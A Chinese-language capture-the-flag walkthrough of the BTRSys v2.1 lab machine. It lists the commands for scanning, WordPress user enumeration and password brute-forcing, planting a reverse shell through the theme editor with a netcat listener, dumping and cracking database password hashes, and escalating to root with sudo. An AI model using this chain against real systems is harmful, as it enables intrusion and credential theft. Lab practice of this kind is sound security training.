BTRSys: v2.1靶场渗透

https://www.vulnhub.com/entry/btrsys-v21,196/

https://portal.offsec.com/machine/btrsys21-114/overview/details

  1. 将两台虚拟机网络连接都改为NAT模式

  2. 攻击机上做namp局域网扫描发现靶机

    nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.155

  1. 对靶机进行端口服务探测

    nmap -sV -T4 -p- -A 192.168.23.155

  1. 访问 21 端口开放的 FTP 服务

    ftp 192.168.23.155

anonymous匿名登录成功,输入binary进入二进制模式

啥也没有,而且权限也不足以进行文件上传

  1. 再来看看网站

没有什么价值的默认网页,扫描其网站子目录看看

复制代码
gobuster dir -u http://192.168.23.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400
  1. 通过目录结构可以看到网站是 wordpress 建站,分别看看网页内容

http://192.168.23.155/robots.txt

http://192.168.23.155/wordpress/

扫描识别网站指纹目录

复制代码
whatweb -v http://192.168.23.155/wordpress/

得知了 WordPress[3.9.14]

  1. 使用专项 wordpress 扫描工具进行扫描

    wpscan --url http://192.168.23.155/wordpress/ --enumerate u

扫描发现 wordpress 存在两个用户:adminbtrisk

  1. 对收集的用户名进行爆破,字典选用/usr/share/wordlists/rockyou.txt

    gunzip /usr/share/wordlists/rockyou.txt.gz
    mousepad user.txt
    wpscan --url "http://192.168.23.155/wordpress/" -P "/usr/share/wordlists/rockyou.txt" --usernames user.txt

成功得到 wordpress 网站的账户密码

admin/admin

  1. 账号密码正确,成功登录进入 wordpress

在后台对wordpress 的主题进行编辑,在下述页面黏贴 kali 自带的反弹 shell 代码

http://192.168.23.155/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=72&updated=true

更新网站页面代码之后,访问 404.php 的网站页面触发反弹 shell

http://192.168.23.155/wordpress/wp-content/themes/twentyfourteen/404.php

  1. 注意 kali 在触发反弹 shell 之前就需要监听 4444 端口以 getshell

    nc -lvvp 4444

然后启动一个可交互式 shell,再进行信息收集操作

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'
id
uname -a
lsb_release -a
  1. 再信息收集一下,查看历史命令

    history

成功得到明文的数据库账户密码信息,登录成功

复制代码
mysql -uroot -prootpassword!
  1. 查看数据库,使用数据库wordpress

    show databases;
    use wordpress;

查看 wordpress数据库下 tables

复制代码
show tables;

查看 wp_users 表当中内容

复制代码
select * from wp_users;

btrisk/a318e4507e5a74604aafb45e4741edd3

admin/21232f297a57a5a743894a0e4a801fc3

将这个密码进行md5解密

https://pmd5.com/

得到 btrisk 用户的密码是roottoor

  1. 注意到 home 目录下存在 btrisk 目录,那么可以合理推测系统用户和网站用户同一个密码

    ssh btrisk@192.168.23.155

ssh 登录成功

  1. 看一下如何提权

    sudo -l
    sudo su

最后成功提权变成 root 用户

相关推荐
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全